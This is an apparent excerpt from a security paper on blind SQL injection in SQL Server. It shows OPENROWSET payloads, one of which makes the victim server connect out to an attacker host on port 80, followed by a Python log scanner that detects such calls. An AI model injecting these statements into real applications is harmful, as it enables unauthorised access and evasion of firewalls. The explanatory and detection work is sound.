Many developers and web administrators are complacent about SQL Injection vulnerabilities if the
attacker cannot see the SQL error messages and/or cannot return the query results directly to
the browser. This topic was first addressed in a white paper written by Chris Anley of
NGSSoftware (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf). This paper
will expand on possible ways this threat can be used.
When trying to exploit SQL Injection in an application, an attacker needs a method of determining
if the SQL injected is executed on the server. As well, a method of retrieving the results is
needed. Two built-in functions of SQL Server can be used for this purpose. The OPENROWSET
and OPENDATASOURCE functions allow a user in SQL Server to open remote data sources.
These functions are used to open a connection to an OLEDB provider. The OPENROWSET
function will be used in all the examples, but the OPENDATASOURCE function could be used with
the same results.
This statement will return all the rows of table1 on the remote data source:
select * from
OPENROWSET( 'SQLoledb',
'server=servername;uid=sa;pwd=h8ck3r',
'select * from table1' )
Parameters:
(1) OLEDB Provider name
(2) Connection string (could be an OLEDB data source or an ODBC connection string)
(3) SQL statement
The connection string parameter can specify other options such as the network library to use or
the IP address and port to which to connect. Below is an example.
select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=h8ck3r;Network=DBMSSOCN;Address=10.0.0.10,1433;',
'select * from table' )
In this example, SQL Server will use the OLEDB provider SQLoledb to execute the SQL
statement. The OLEDB provider will use the SQL Server sockets library (DBMSSOCN) to
connect to port 1433 on the IP address 10.0.0.10 and will return the results of the SQL statement
to the local SQL Server. The login sa and the password h8ck3r will be used to authenticate to the
remote data source.
The next example demonstrates how the OPENROWSET function can be used to connect to an
arbitrary IP address/port including the source IP address and port of the attacker. In this case the
hacker’s host name is hackersip and a version of Microsoft SQL Server is running on port 80.
“hackersip” can be replaced with an IP address and the port can be any port the hacker would
like to direct connections to.
select * from
OPENROWSET('SQLoledb',
'uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;',
'select * from table')
By injecting this SQL statement, an attacker can determine if the statement is being executed. If
the SQL is successfully executed, the attacked server will issue an outbound connection attempt
to the attacker’s computer on the port specified. It is also unlikely that the firewall will block this
outbound SQL connection because the connection is occurring over port 80.
This technique allows the attacker to determine if injected SQL statements executed even if error
messages and query results are not returned to the browser.
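As an added example (not part of the original paper), the following Python scans logged statement text for ad hoc OPENROWSET/OPENDATASOURCE calls, extracts where the OLEDB provider would connect, and flags targets outside an allowlist or on a non-standard SQL port, which is the outbound-connection pattern described above. The sample statements and the allowlist of known remote hosts are constructed assumptions.

```python
import re

# Constructed sample of statement text as it might appear in a SQL Server
# trace or application query log (assumed data, not a real capture).
SAMPLE_STATEMENTS = [
    "select name from products where id = 42",
    "select * from OPENROWSET('SQLoledb', 'server=reporting;uid=sa;pwd=h8ck3r', 'select * from table1')",
    "select * from OPENROWSET('SQLoledb', 'uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;', 'select * from table')",
    "select * from OPENDATASOURCE('SQLoledb', 'Data Source=10.0.0.10,1433;User ID=sa;Password=x').db.dbo.t",
]
# Remote hosts this server is legitimately expected to reach (assumed allowlist).
KNOWN_REMOTE_HOSTS = {"reporting", "10.0.0.10"}
DEFAULT_SQL_PORT = 1433
# Function name, then the provider argument (skipped), then the connection string.
AD_HOC_RE = re.compile(
    r"\b(OPENROWSET|OPENDATASOURCE)\s*\(\s*'[^']*'\s*,\s*'([^']*)'", re.IGNORECASE)

def parse_connection_string(conn):
    """Split 'key=value;key=value' into a dict with lower-cased keys."""
    pairs = (part.split("=", 1) for part in conn.split(";") if "=" in part)
    return {k.strip().lower(): v.strip() for k, v in pairs}

def target_of(conn):
    """Return (host, port) the OLEDB provider would connect to, or (None, None)."""
    kv = parse_connection_string(conn)
    addr = kv.get("address") or kv.get("data source") or kv.get("server")
    if not addr:
        return None, None
    host, _, port = addr.partition(",")
    return host.strip(), int(port) if port.strip().isdigit() else DEFAULT_SQL_PORT

def find_ad_hoc_remote_queries(statements, known_hosts=KNOWN_REMOTE_HOSTS):
    """Return (index, function, host, port, reasons) for every ad hoc remote
    query; an empty reasons list means the target looks expected."""
    findings = []
    for i, stmt in enumerate(statements):
        m = AD_HOC_RE.search(stmt)
        if not m:
            continue
        host, port = target_of(m.group(2))
        reasons = []
        if host is None:
            reasons.append("no target host in connection string")
        elif host not in known_hosts:
            reasons.append("unknown remote host")
        if port is not None and port != DEFAULT_SQL_PORT:
            reasons.append(f"non-standard SQL port {port}")
        findings.append((i, m.group(1).upper(), host, port, reasons))
    return findings
```

Any finding with a non-empty reasons list is worth correlating with firewall logs for outbound connections from the database host on the flagged port.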